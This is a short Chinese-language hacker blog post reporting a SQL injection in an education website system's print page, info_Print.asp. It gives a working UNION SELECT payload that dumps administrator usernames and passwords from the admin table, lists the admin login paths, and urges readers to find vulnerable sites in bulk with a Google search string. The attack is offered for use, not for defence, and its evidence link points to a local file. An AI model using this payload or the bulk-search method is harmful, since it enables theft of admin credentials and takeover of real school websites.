教育站打印页面漏洞存在注入漏洞可直接爆出管理帐号密码。
漏洞存在页面:info_Print.asp
漏洞类型:注入漏洞、
测试漏洞代码
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from admin
网站登录后台:
website/ad_login.asp
/ad_login.asp
漏洞存在证据
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtmlclip1/01/clip_image001.jpg
大家可用谷歌搜索关键字进行批量检测: inurl:info_Print.asp?ArticleID=
© Hacker 小风's Blog | Powered by LOFTER